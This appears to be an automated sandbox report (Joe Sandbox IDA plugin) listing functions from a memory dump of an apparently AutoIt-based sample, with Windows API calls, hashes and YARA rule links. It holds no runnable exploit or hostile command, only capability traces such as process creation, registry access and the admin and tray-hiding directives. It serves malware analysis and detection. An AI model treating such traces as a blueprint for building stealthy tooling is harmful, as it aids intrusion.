Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 82488ca8ec9708bf91d0128eeb945009573e6980c0ec29202b233cce566c826c
Instruction ID: e537e6b704540b92f0beb5df9f3a0206db46fc9ab43811668c64598df52d47ce
Opcode Fuzzy Hash: 82488ca8ec9708bf91d0128eeb945009573e6980c0ec29202b233cce566c826c
Instruction Fuzzy Hash: 0F311A7190121DBFDB14DB94DC89EFEB7BDEF09300F00416AE612E2290E6749F499B60

Function 006F8DD5 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 006F8DF4
GetWindowLongW.USER32(011CB938,000000F0), ref: 006F8E27
GetWindowLongW.USER32(011CB938,000000F0), ref: 006F8E5C
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 006F8E8E
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 006F8EB8
GetWindowLongW.USER32(?,000000F0), ref: 006F8EC9
SetWindowLongW.USER32(?,000000F0,00000000), ref: 006F8EE3

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 5e71559d64a21a5b00bd3511ec246fb178e505addab54bd88d7fd27053de9128
Instruction ID: e0548f31cbe07f8affa3e7ea7278263dd151d3147fe699216bde17d9a7fe1d88
Opcode Fuzzy Hash: 5e71559d64a21a5b00bd3511ec246fb178e505addab54bd88d7fd27053de9128
Instruction Fuzzy Hash: 25311731600219EFEB20CF58DC85FA537A6FB4A765F1581A4F6158B2B2CF75AC40DB44

Function 006D16F1 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006D1734
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006D175A
SysAllocString.OLEAUT32(00000000), ref: 006D175D
SysAllocString.OLEAUT32(?), ref: 006D177B
SysFreeString.OLEAUT32(?), ref: 006D1784
StringFromGUID2.COMBASE(?,?,00000028), ref: 006D17A9
SysAllocString.OLEAUT32(?), ref: 006D17B7

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 997bd4f2622f471da8e90ee35fb5f87ab11567d6f76b822c46b650204aafceaf
Instruction ID: ea5b7e58d070181a773e1855980350dcb098e7fac9df1ec9259f64836d9f1ffe
Opcode Fuzzy Hash: 997bd4f2622f471da8e90ee35fb5f87ab11567d6f76b822c46b650204aafceaf
Instruction Fuzzy Hash: 5A2156756002197F9B109BA8DC84CEB77EDEB09360740C126FD15DB3A0D674EC418B64

Function 006D69F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 006931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 006931DA

lstrcmpiW.KERNEL32(?,?), ref: 006D6A2B
_wcscmp.LIBCMT ref: 006D6A49
MoveFileW.KERNEL32(?,?), ref: 006D6A62

Part of subcall function 006D6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 006D6DBA
Part of subcall function 006D6D6D: GetLastError.KERNEL32 ref: 006D6DC5
Part of subcall function 006D6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 006D6DD9

_wcscat.LIBCMT ref: 006D6AA4
SHFileOperationW.SHELL32(?), ref: 006D6B0C

Strings

\*.*, xrefs: 006D6A9E

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 2323102230-1173974218
Opcode ID: 63fa63d7061b5f1832f5aa48dfe73022de0094f0f59c28d87c393f6035ac0261
Instruction ID: 9e291284767d0fcba12bc10841d44a9a522d616ee68f4c34e01b7428652a3e46
Opcode Fuzzy Hash: 63fa63d7061b5f1832f5aa48dfe73022de0094f0f59c28d87c393f6035ac0261
Instruction Fuzzy Hash: 3B3125B1C002186ACF51EFA4D845ADDB7B9AF08300F5445DBF505E7251EB349B89CFA4

Function 006D2FCD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 006D2FE0
__wcsnicmp.LIBCMT ref: 006D3001
__wcsnicmp.LIBCMT ref: 006D301B

Strings

#OnAutoItStartRegister, xrefs: 006D3015
#requireadmin, xrefs: 006D2FFB
#notrayicon, xrefs: 006D2FD8

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: a2be8621be66fe4424e0456c3e5868bf06fdeb5845408c11b1c74ee08a1717bb
Instruction ID: 557640ca7e19c4e7639cc47752aefcad8838743c709eb5d254adb146df39d1e4
Opcode Fuzzy Hash: a2be8621be66fe4424e0456c3e5868bf06fdeb5845408c11b1c74ee08a1717bb
Instruction Fuzzy Hash: 0B2125B29442227AD230A7349C12EF773EA9F65300F14442BF44687395EB919E82C3A6

Function 006D17C8 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006D180D
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006D1833
SysAllocString.OLEAUT32(00000000), ref: 006D1836
SysAllocString.OLEAUT32 ref: 006D1857
SysFreeString.OLEAUT32 ref: 006D1860
StringFromGUID2.COMBASE(?,?,00000028), ref: 006D187A
SysAllocString.OLEAUT32(?), ref: 006D1888

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: a2deb18a68380504b2cf41f41304aebb6139928e69c3a9caa3a307cda66d62b3
Instruction ID: e2f603d0329ec3547591a34ce73cf67886ef3ae230098af9c45b322b8fccbfc2
Opcode Fuzzy Hash: a2deb18a68380504b2cf41f41304aebb6139928e69c3a9caa3a307cda66d62b3
Instruction Fuzzy Hash: 512115756041047F9B10DBECDC89DEA77EDEB0A360740C126F915DB3A1D6B4EC419B64

Function 006FA0D6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006AC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 006AC657
Part of subcall function 006AC619: GetStockObject.GDI32(00000011), ref: 006AC66B
Part of subcall function 006AC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 006AC675

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 006FA13B
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 006FA148
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 006FA153
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 006FA162
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 006FA16E

Strings

Msctls_Progress32, xrefs: 006FA10C

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 32b7d75189419affd5b5564da34cbae24f1758c32a7437f1f7748ed50c9f3dac
Instruction ID: fef54667949bda55263d165e829bab43c81b5d4569a7be3a0077eb3ec2a7a28d
Opcode Fuzzy Hash: 32b7d75189419affd5b5564da34cbae24f1758c32a7437f1f7748ed50c9f3dac
Instruction Fuzzy Hash: 301193B114021DBEEF119FA4CC85EE77F6DEF09798F014115F708A6090C6769C21DBA4

Function 006B4C3D Relevance: 10.5, APIs: 7, Instructions: 47threadCOMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 006B4C3E

Part of subcall function 006B86B5: GetLastError.KERNEL32(?,006B0127,006B88A3,006B4673,?,?,006B0127,?,0069125D,00000058,?,?), ref: 006B86B7
Part of subcall function 006B86B5: __calloc_crt.LIBCMT ref: 006B86D8
Part of subcall function 006B86B5: GetCurrentThreadId.KERNEL32 ref: 006B8701
Part of subcall function 006B86B5: SetLastError.KERNEL32(00000000,006B0127,006B88A3,006B4673,?,?,006B0127,?,0069125D,00000058,?,?), ref: 006B8719

CloseHandle.KERNEL32(?,?,006B4C1D), ref: 006B4C52
__freeptd.LIBCMT ref: 006B4C59
RtlExitUserThread.NTDLL(00000000,?,006B4C1D), ref: 006B4C61
GetLastError.KERNEL32(?,?,006B4C1D), ref: 006B4C91
RtlExitUserThread.NTDLL(00000000,?,?,006B4C1D), ref: 006B4C98
__freefls@4.LIBCMT ref: 006B4CB4

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
String ID:
API String ID: 1445074172-0
Opcode ID: a01f4da1b4ac5263d85fb4f02563d268434218c90bf5ed05929cd627219410de
Instruction ID: 00e4cec092005f171dfce2e8034e16a6b76bb8c3de5057f551b96ee57861222d
Opcode Fuzzy Hash: a01f4da1b4ac5263d85fb4f02563d268434218c90bf5ed05929cd627219410de
Instruction Fuzzy Hash: EF01B1B5401601AFC768BB78D90A9C97BAAAF04714710C51CF6198B292EF38DCC2CB59

Function 006FE13E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006FE14D
_memset.LIBCMT ref: 006FE15C
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00753EE0,00753F24), ref: 006FE18B
CloseHandle.KERNEL32 ref: 006FE19D

Strings

>u, xrefs: 006FE147
$?u, xrefs: 006FE156

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: $?u$>u
API String ID: 3277943733-70107955
Opcode ID: e79063b5e3a1c159f31bcd16bcb6aec17169e280c191c2bde077ea67392067c0
Instruction ID: b3b1eef1f00f8c699af564878bf601844b1491ddde57a0ee0761bc0690ee2e82
Opcode Fuzzy Hash: e79063b5e3a1c159f31bcd16bcb6aec17169e280c191c2bde077ea67392067c0
Instruction Fuzzy Hash: 48F030F1940314BBF2106765AC16FF77AADDB05795F008425BA04D91F1D3FA4E1057AC

Function 006AC697 Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 006AC6C0
GetWindowRect.USER32(?,?), ref: 006AC701
ScreenToClient.USER32(?,?), ref: 006AC729
GetClientRect.USER32(?,?), ref: 006AC856
GetWindowRect.USER32(?,?), ref: 006AC86F

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: bdc1d84cc9767eb11752864f0cb86ec4821ce87bda4d92916732f3ce0bb14878
Instruction ID: 46e1ba2ab1ab8e8ea882010d7056d77fd8690805bf2b76582e7706b4fe265c48
Opcode Fuzzy Hash: bdc1d84cc9767eb11752864f0cb86ec4821ce87bda4d92916732f3ce0bb14878
Instruction Fuzzy Hash: E5B1377990024ADBDB10DFA8C5807EDBBB2FF09310F14952AEC59AB255DB34AD41CF64

Function 006D9569 Relevance: 9.2, APIs: 6, Instructions: 204COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006D96BC
_memmove.LIBCMT ref: 006D95F7

Part of subcall function 006984A6: __swprintf.LIBCMT ref: 006984E5
Part of subcall function 006984A6: __itow.LIBCMT ref: 00698519

_memmove.LIBCMT ref: 006D966A
_memmove.LIBCMT ref: 006D9751
_memmove.LIBCMT ref: 006D976A
_memmove.LIBCMT ref: 006D9786

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
Instruction ID: 8a74a7864b04d75e22e9f28c397bb166af56dd254789a5a58267b95a3e761470
Opcode Fuzzy Hash: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
Instruction Fuzzy Hash: D261AE3091024A9FDF41EF64CC81EFE37AAAF45314F04446AF85A6B292EB34DD05CB65

Function 006F2EC7 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0069CAEE: _memmove.LIBCMT ref: 0069CB2F

Part of subcall function 006F3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006F2AA6,?,?), ref: 006F3B0E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006F2FA0
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006F2FE0
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 006F3003
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 006F302C
RegCloseKey.ADVAPI32(?,?,00000000), ref: 006F306F
RegCloseKey.ADVAPI32(00000000), ref: 006F307C

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 77f96e5a72f05f31dbfb9fe9961908d0b6afa5f11da72bb5235a19c1e3064069
Instruction ID: 108eade22376d7bed73d6ffdce0975a91cfc0482d285e6ecd0f82bcd4a2c2b51
Opcode Fuzzy Hash: 77f96e5a72f05f31dbfb9fe9961908d0b6afa5f11da72bb5235a19c1e3064069
Instruction Fuzzy Hash: 17516A311182059FCB14EF64C891EAEB7FAFF88714F04491EF646872A1DB71EA05CB56

Function 006ADB8C Relevance: 9.2, APIs: 6, Instructions: 160COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 006ADCC0
_wcscat.LIBCMT ref: 006ADCC7
_wcscpy.LIBCMT ref: 00703CCB

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _wcscpy$_wcscat
String ID:
API String ID: 2037614760-0
Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
Instruction ID: d4e9d9a0e4ff51894073385ee7ca61ca155b89afde5131940154c174b1d53a4f
Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
Instruction Fuzzy Hash: AF51D270904115BACF21BF98C4519FDB7BAEF06720F90404AF583AB691DB745F82DBA4

Function 006D2ADC Relevance: 9.2, APIs: 6, Instructions: 158COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 006D2AF6
VariantClear.OLEAUT32(00000013), ref: 006D2B68
VariantClear.OLEAUT32(00000000), ref: 006D2BC3
_memmove.LIBCMT ref: 006D2BED
VariantClear.OLEAUT32(?), ref: 006D2C3A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 006D2C68

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 62ef28d83bcc331957b1861eca6dd8810fd20f6e3c240f08f5ea87d13eeb7bf1
Instruction ID: f883ebef8aab2dae3c1bd871f5e3d0eb52937d1bd22b5bacb6b88152c4f9e1ab
Opcode Fuzzy Hash: 62ef28d83bcc331957b1861eca6dd8810fd20f6e3c240f08f5ea87d13eeb7bf1
Instruction Fuzzy Hash: 82518CB5A0020AEFDB24CF58C890AAAB7B9FF5C314B15855AED49DB340D334E941CFA0

Function 006F82DB Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 006F833D
GetMenuItemCount.USER32(00000000), ref: 006F8374
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 006F839C
GetMenuItemID.USER32(?,?), ref: 006F840B
GetSubMenu.USER32(?,?), ref: 006F8419
PostMessageW.USER32(?,00000111,?,00000000), ref: 006F846A

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 50afc9489ce8a381209b88e00aa0984612fc472f6bc8b754589088046d6a6d02
Instruction ID: 375ca4a057e8f9d8413393d36c52ac752b97b9979f61fed1f4aca927aa4547b5
